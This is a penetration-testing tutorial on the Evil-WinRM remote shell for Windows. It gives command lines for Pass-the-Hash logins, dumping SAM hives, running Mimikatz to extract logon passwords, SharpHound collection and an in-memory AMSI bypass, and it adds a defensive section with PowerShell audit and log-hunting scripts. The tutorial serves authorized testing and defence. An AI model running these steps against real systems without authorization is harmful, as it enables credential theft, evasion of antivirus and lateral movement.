Ethical Hacking #evil-winrm #winrm #windows-pentesting

Evil-WinRM: Windows Remote Management for Pentesters

Learn how to use Evil-WinRM for Windows remote management pentesting — authentication methods, file transfers, script loading, and bypass techniques.


Evil-WinRM is a WinRM (Windows Remote Management) shell built for penetration testers. Microsoft's WinRM exists for legitimate remote administration of Windows systems; Evil-WinRM wraps the same protocol with attacker-friendly features: Pass-the-Hash authentication, loading PowerShell scripts and .NET executables straight from your own machine into the remote session, SSL support, file upload/download, and built-in helpers for common post-exploitation tasks.

If you have valid credentials (or a hash) and port 5985 or 5986 is open, Evil-WinRM often provides the cleanest remote shell on a Windows target.

What is WinRM?

Windows Remote Management is Microsoft's implementation of the WS-Management protocol: SOAP over HTTP(S). It listens on:

  • Port 5985: HTTP. The transport is plaintext, but with the default service settings (AllowUnencrypted=false, Negotiate/Kerberos authentication) the SOAP bodies are still encrypted with the NTLM or Kerberos session key. Only Basic authentication or AllowUnencrypted=true puts credentials and commands on the wire in the clear.
  • Port 5986: HTTPS. TLS adds server authentication and hides the whole exchange, including the authentication handshake.

WinRM is enabled by default on Windows Server 2012 and later. On workstations it is off by default but is frequently switched on by Group Policy in enterprise environments. To open a shell, the account must be a local administrator or a member of the Remote Management Users group (or be granted access explicitly in the session configuration's security descriptor). Local administrator accounts other than the built-in Administrator are additionally subject to UAC remote restrictions and are refused unless LocalAccountTokenFilterPolicy is set to 1; domain accounts in the local Administrators group are not affected by this.
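A way to see exactly this exposure on a host you administer, or have just landed on, as an added PowerShell example that is not part of the original page or the Evil-WinRM project. It assumes an elevated prompt on the Windows host itself, with the WSMan: drive and the NetSecurity module available (Windows 8/Server 2012 and later); the report is built from the same settings the section above describes, plus the firewall scope that decides who can reach the listener at all.

```powershell
# Added example (not from the page or the Evil-WinRM project): summarise how
# this host exposes WinRM. Run in an elevated PowerShell on the host.
# Assumption: the WSMan: drive (WinRM running) and the NetSecurity cmdlets exist.

function Get-WinRmExposure {
    [CmdletBinding()]
    param()

    $svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
    $report = [ordered]@{
        Service               = if ($svc) { [string]$svc.Status } else { 'NotInstalled' }
        Listeners             = @()
        AllowUnencrypted      = $null
        BasicAuth             = $null
        RemoteManagementUsers = @()
        InboundFirewallScope  = @()
        Findings              = @()
    }
    if (-not $svc -or $svc.Status -ne 'Running') {
        $report.Findings += 'WinRM service not running: host is not reachable over WinRM'
        return [pscustomobject]$report
    }

    # Each listener is a container under WSMan:\localhost\Listener whose child
    # items are its properties (Transport, Address, Port, ...).
    foreach ($l in Get-ChildItem -Path WSMan:\localhost\Listener) {
        $p = @{}
        foreach ($i in Get-ChildItem -Path $l.PSPath) { $p[$i.Name] = $i.Value }
        $report.Listeners += [pscustomobject]@{ Transport = $p['Transport']; Address = $p['Address']; Port = $p['Port'] }
    }
    $report.AllowUnencrypted = (Get-Item -Path WSMan:\localhost\Service\AllowUnencrypted).Value
    $report.BasicAuth        = (Get-Item -Path WSMan:\localhost\Service\Auth\Basic).Value
    $report.RemoteManagementUsers = @(Get-LocalGroupMember -Group 'Remote Management Users' -ErrorAction SilentlyContinue | ForEach-Object Name)

    # Enabled inbound rules in the WinRM group and the remote addresses they accept.
    foreach ($r in Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' -Direction Inbound -Enabled True -ErrorAction SilentlyContinue) {
        $remote = ($r | Get-NetFirewallAddressFilter).RemoteAddress
        $report.InboundFirewallScope += "$($r.DisplayName) [$($r.Profile)]: $($remote -join ',')"
        if ($remote -contains 'Any') {
            $report.Findings += "Firewall rule '$($r.DisplayName)' accepts WinRM from any address; scope it to management hosts"
        }
    }

    $transports = $report.Listeners | ForEach-Object Transport
    if ($transports -contains 'HTTP' -and $transports -notcontains 'HTTPS') {
        $report.Findings += 'Only an HTTP (5985) listener: message bodies are still NTLM/Kerberos-encrypted, but there is no server authentication'
    }
    if ($report.AllowUnencrypted -eq 'true') {
        $report.Findings += 'AllowUnencrypted=true: credentials and commands can cross the wire in cleartext over HTTP'
    }
    if ($report.BasicAuth -eq 'true') {
        $report.Findings += 'Basic authentication enabled: the password is only base64-encoded; over HTTP it is effectively plaintext'
    }
    if ($report.RemoteManagementUsers.Count -gt 0) {
        $report.Findings += "Non-admin WinRM access via Remote Management Users: $($report.RemoteManagementUsers -join ', ')"
    }
    [pscustomobject]$report
}

# Usage:
# $x = Get-WinRmExposure
# $x.Listeners | Format-Table
# $x.Findings
```

Run it before and after a hardening change: the Findings list is empty on a host that has only an HTTPS listener, AllowUnencrypted and Basic off, an empty Remote Management Users group, and firewall rules scoped to the management subnet.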

Installing Evil-WinRM

Evil-WinRM is a Ruby gem. Install it with:

gem install evil-winrm

Or run it from the source:

git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
gem install bundler
bundle install
ruby evil-winrm.rb --help

On Kali Linux, Evil-WinRM is preinstalled.

Basic Connection

Connect with a username and password:

evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd'
Flag   Description
-i     Target IP address or hostname
-u     Username
-p     Password
-H     NT hash (Pass-the-Hash)
-P     Port (default: 5985; 5986 when -S is given)
-S     Enable SSL (HTTPS listener, port 5986)
-c     Client certificate (PEM) for certificate-based authentication
-k     Private key for the client certificate
-s     Local directory of PowerShell scripts to make loadable in the session
-e     Local directory of .NET executables for Invoke-Binary
-r     Kerberos realm

Pass-the-Hash Authentication

If you have an NTLM hash from an earlier credential dump (Mimikatz, secretsdump, a SAM or NTDS extraction), you can authenticate without the plaintext password, because WinRM's NTLM authentication only ever proves knowledge of the NT hash. -H takes the NT hash alone:

evil-winrm -i 192.168.1.100 -u administrator -H 32ed87bdb5fdc5e9cba88885d6df0b16

Dump output such as secretsdump's administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88885d6df0b16::: lists the LM hash first and the NT hash second. The LM value aad3b435b51404eeaad3b435b51404ee is the "empty" LM hash you will see on any modern system where LM hashes are disabled; it plays no part in NTLM authentication, so copy only the second 32-hex-character field. Pass-the-Hash also requires NTLM to be permitted for that account on the target; if NTLM is disabled (for example for members of Protected Users), use Kerberos with a ticket as described below.

SSL Connection (Port 5986)

For a TLS-wrapped connection to an HTTPS listener (the port switches to 5986 automatically):

evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd' -S

Evil-WinRM does not validate the server certificate, so self-signed listeners work without extra flags. If the listener is configured for client certificate mapping, authenticate with a certificate and private key instead of a password:

evil-winrm -i 192.168.1.100 -S -c cert.pem -k key.pem

File Transfer

Evil-WinRM has built-in upload and download commands, so there is no need for an SMB share or HTTP server on your side.

Upload to Target

# From within the Evil-WinRM shell (the remote path defaults to the current directory):
*Evil-WinRM* PS C:\Users\Administrator\Desktop> upload /home/kali/tools/mimikatz.exe C:\Users\Administrator\Desktop\mimikatz.exe

Download from Target

Registry hives such as SAM and SYSTEM are held open by the kernel while Windows runs, so pulling them straight out of C:\Windows\System32\config fails. Export a copy with reg save (requires local administrator) and download that instead; repeat for HKLM\SYSTEM, whose boot key is needed to decrypt the SAM:

*Evil-WinRM* PS C:\Windows\Temp> reg save HKLM\SAM C:\Windows\Temp\sam.hiv
*Evil-WinRM* PS C:\Windows\Temp> download C:\Windows\Temp\sam.hiv /home/kali/loot/sam.hiv

Files travel through the WinRM channel itself, base64-encoded in chunks, so no additional ports need to be open; the trade-off is that large transfers are slow and every chunk is visible in the session traffic.

Automatic Script Loading

One of Evil-WinRM's most useful features is running PowerShell from your own machine without first copying it to the target. Point -s at a local directory of .ps1 files; inside the shell, type a script's file name (tab completion works) to read it from your disk and define its functions in the remote session, where they can then be called like any cmdlet:

evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd' -s /usr/share/windows-resources/powersploit/Recon/

# In the shell: load PowerView, then use its functions
*Evil-WinRM* PS C:\> PowerView.ps1
*Evil-WinRM* PS C:\> Get-NetUser -SPN
*Evil-WinRM* PS C:\> Invoke-ShareFinder

Any PowerSploit or PowerView function becomes available this way. The script body is sent through the WinRM channel and executed inside the session's PowerShell process, so it never touches the target's disk; it is, however, scanned by AMSI and recorded by PowerShell script block logging where that is enabled.

.NET assemblies (SharpHound, Rubeus and the other Sharp* tools) are handled the same way with -e and Invoke-Binary, which reads the executable from your machine, loads it into the remote process with reflection and calls its entry point. Arguments are passed as a single comma-separated string:

evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd' \
  -e /opt/SharpCollection/

# In the shell (the path tab-completes from the -e directory):
*Evil-WinRM* PS C:\> Invoke-Binary /opt/SharpCollection/SharpHound.exe "-c,All"

Built-in Commands

Evil-WinRM adds these commands to the remote PowerShell prompt:

Command                              Description
upload <local> [remote]              Upload a file; remote defaults to the current directory on the target
download <remote> [local]            Download a file; local defaults to the current directory on your machine
services                             List Windows services
menu                                 Show the built-in commands plus any functions loaded from -s scripts
Invoke-Binary <exe> [args]           Load a .NET executable from your machine and run it in memory in the session; args are one comma-separated string
Bypass-4MSI                          Patch AMSI in the session's process
Dll-Loader -http|-smb|-local -path   Load a DLL into the session from an HTTP URL, an SMB share or a path on the target

Bypassing AMSI

AMSI (Antimalware Scan Interface) hands script content to the installed antivirus engine before PowerShell runs it, so loading well-known tooling such as PowerView or Invoke-Mimikatz into the session is typically blocked. Evil-WinRM ships a built-in bypass:

*Evil-WinRM* PS C:\> Bypass-4MSI

This patches the AMSI scanning routine in memory for the current process only (the wsmprovhost.exe hosting your session), so run it before loading scripts, and again in every new session. Two caveats: the bypass is itself a known signature, so it may be flagged or fail against a current Defender build, and it does nothing about EDR telemetry or script block logging, which still record what you load afterwards.

Kerberos Authentication

Where NTLM is disabled, or you want to avoid the NTLM logon events that Pass-the-Hash generates, Evil-WinRM can authenticate with a Kerberos ticket. Obtain a TGT first, then pass the realm with -r and address the target by the hostname in its SPN rather than by IP:

kinit administrator@CORP.LOCAL
evil-winrm -i dc01.corp.local -u administrator -r CORP.LOCAL

Your /etc/krb5.conf must point the realm at the right KDC, the target's hostname must resolve (add it to /etc/hosts if you are not using the domain's DNS), realm names are case-sensitive and conventionally upper case, and clock skew between you and the KDC must stay within the five-minute default or the ticket is rejected.

Common Post-Exploitation Tasks via Evil-WinRM

Once connected, you have a full PowerShell environment running under your account's token. One limitation to keep in mind: the session is non-interactive, so anything that prompts for input or needs a desktop will hang the shell; pass every argument on the command line.

Enumerate Users and Groups

Get-LocalUser
Get-LocalGroupMember -Group "Administrators"
net user /domain
net group "Domain Admins" /domain

Check Current Privileges

whoami /priv
whoami /groups

Dump Credentials with Mimikatz

Upload and run Mimikatz. The binary on disk will be caught by most antivirus engines; if that matters, load Invoke-Mimikatz from the -s scripts directory and run it in memory instead. Either way, finish the argument list with "exit", otherwise Mimikatz drops into its interactive prompt and the session hangs:

*Evil-WinRM* PS C:\Windows\Temp> upload /opt/mimikatz.exe
*Evil-WinRM* PS C:\Windows\Temp> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

Run SharpHound for BloodHound

SharpHound prefixes its output file name with a timestamp, so list the directory before downloading rather than guessing the name:

*Evil-WinRM* PS C:\Windows\Temp> upload /opt/SharpHound.exe
*Evil-WinRM* PS C:\Windows\Temp> .\SharpHound.exe -c All --zipfilename bloodhound.zip
*Evil-WinRM* PS C:\Windows\Temp> dir *bloodhound.zip
*Evil-WinRM* PS C:\Windows\Temp> download C:\Windows\Temp\<timestamp>_bloodhound.zip /home/kali/loot/bloodhound.zip

Discovering WinRM Targets

Find WinRM-enabled hosts during a network assessment:

# Nmap scan for WinRM ports
nmap -p 5985,5986 192.168.1.0/24 --open -oG winrm_hosts.txt

# CrackMapExec discovery
crackmapexec winrm 192.168.1.0/24

Defensive Considerations

  • Disable WinRM (Disable-PSRemoting and stop the WinRM service) on workstations where remote management is not required
  • Restrict inbound 5985/5986 with Windows Firewall rules so that only designated management hosts can connect, instead of the default Any/LocalSubnet scopes
  • Keep AllowUnencrypted=false and Basic authentication disabled; prefer an HTTPS listener, with certificate-based authentication where your tooling supports it
  • Keep the Remote Management Users group empty unless a specific account needs it, and deploy LAPS so that a local administrator hash from one host does not open WinRM on every other host
  • Monitor the Microsoft-Windows-WinRM/Operational log for Event ID 169 (user authenticated; the message names the account and whether NTLM or Kerberos was used, and Pass-the-Hash always shows as NTLM) and Event ID 91 (shell created), correlate them with Security 4624 logon type 3 from unexpected source addresses, and alert on processes whose parent is wsmprovhost.exe
  • Privileged Access Workstations (PAW) and the Protected Users group limit where privileged credentials can authenticate from and whether NTLM is usable with them at all
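The monitoring points above turned into a hunt, as an added PowerShell example that is not from the page or the Evil-WinRM project. It runs elevated on the WinRM target (or against forwarded copies of its Security, WinRM/Operational and Sysmon logs), attaches the client address from Security 4624 to each WinRM 169 authentication by matching account name and time, and lists every process spawned under wsmprovhost.exe. The management-host allow-list, the look-back and the correlation window are placeholder values to adjust; the Sysmon part assumes Sysmon is installed and simply returns nothing otherwise.

```powershell
# Added example (not from the page or the Evil-WinRM project).
# Run elevated on the WinRM target, or against forwarded copies of its logs.
# Placeholders: the allow-list addresses, the look-back and the correlation window.

function Find-UnexpectedWinRmLogons {
    [CmdletBinding()]
    param(
        [string[]]$AllowedSources = @('10.0.0.10', '10.0.0.11'),  # assumed PAW / jump host addresses
        [int]$LookbackHours = 24,
        [int]$CorrelationSeconds = 10
    )
    $since = (Get-Date).AddHours(-$LookbackHours)

    # Turns an event's <EventData><Data Name="..."> elements into a hashtable.
    function ConvertTo-EventDataTable([System.Diagnostics.Eventing.Reader.EventRecord]$Event) {
        $d = @{}
        foreach ($n in ([xml]$Event.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        return $d
    }

    # Security 4624 with LogonType 3: every WinRM logon produces one on the target and
    # it carries the client address. SMB and other network logons produce them too,
    # so they are only used to attach an address to the WinRM events below.
    $netLogons = foreach ($e in Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $since } -ErrorAction SilentlyContinue) {
        $d = ConvertTo-EventDataTable $e
        if ($d['LogonType'] -eq '3') {
            [pscustomobject]@{ Time = $e.TimeCreated; User = $d['TargetUserName']; Ip = $d['IpAddress']; Package = $d['AuthenticationPackageName'] }
        }
    }

    # WinRM/Operational 169 on the target: "User DOMAIN\name authenticated successfully
    # using NTLM|Kerberos authentication". Pass-the-Hash always shows up as NTLM.
    $winrmAuth = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WinRM/Operational'; Id = 169; StartTime = $since } -ErrorAction SilentlyContinue
    $findings = foreach ($e in $winrmAuth) {
        if ($e.Message -match 'User (?<user>\S+) authenticated successfully using (?<auth>\S+) authentication') {
            $fullUser = $Matches.user
            $auth     = $Matches.auth
            $name     = ($fullUser -split '\\')[-1]
            $when     = $e.TimeCreated
            $peer = $netLogons | Where-Object {
                $_.User -eq $name -and [math]::Abs(($_.Time - $when).TotalSeconds) -le $CorrelationSeconds
            } | Select-Object -First 1
            $ip = if ($peer) { $peer.Ip } else { 'unknown' }
            if ($ip -notin $AllowedSources) {
                [pscustomobject]@{
                    Time   = $when
                    User   = $fullUser
                    Auth   = $auth
                    From   = $ip
                    Reason = if ($ip -eq 'unknown') { 'WinRM authentication with no matching 4624' } else { 'WinRM authentication from a non-management host' }
                }
            }
        }
    }

    # Sysmon 1 whose parent is wsmprovhost.exe: anything an operator ran through the
    # session that became a real process (mimikatz.exe, SharpHound.exe, net.exe ...).
    # Tooling that stays inside the PowerShell process (-s scripts, Invoke-Binary) does not appear here.
    $children = foreach ($e in Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = $since } -ErrorAction SilentlyContinue) {
        $d = ConvertTo-EventDataTable $e
        if ($d['ParentImage'] -like '*\wsmprovhost.exe') {
            [pscustomobject]@{ Time = $e.TimeCreated; User = $d['User']; CommandLine = $d['CommandLine'] }
        }
    }

    [pscustomobject]@{ SuspiciousLogons = @($findings); SessionChildProcesses = @($children) }
}

# Usage:
# $r = Find-UnexpectedWinRmLogons -AllowedSources '10.0.0.10' -LookbackHours 72
# $r.SuspiciousLogons      | Format-Table -AutoSize
# $r.SessionChildProcesses | Format-Table -AutoSize -Wrap
```

An Evil-WinRM Pass-the-Hash session from a Linux host shows up as a 169 with Auth=NTLM and a From address outside the allow-list; the same operator running the page's .\mimikatz.exe or .\SharpHound.exe commands then appears in SessionChildProcesses with wsmprovhost.exe as the parent, which is a combination no legitimate remote administration produces.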

Summary

Evil-WinRM turns a WinRM listener and one set of valid credentials into a complete post-exploitation platform. Pass-the-Hash support, loading PowerShell scripts from your own disk, in-memory execution of .NET binaries, and a built-in AMSI bypass make it a first choice for maintaining access and moving laterally in Windows environments. Identify WinRM-enabled hosts early in the assessment, and remember that everything it does is recorded in the target's WinRM Operational and Security logs for any defender who is looking.

#post-exploitation #lateral-movement #windows-pentesting #winrm #evil-winrm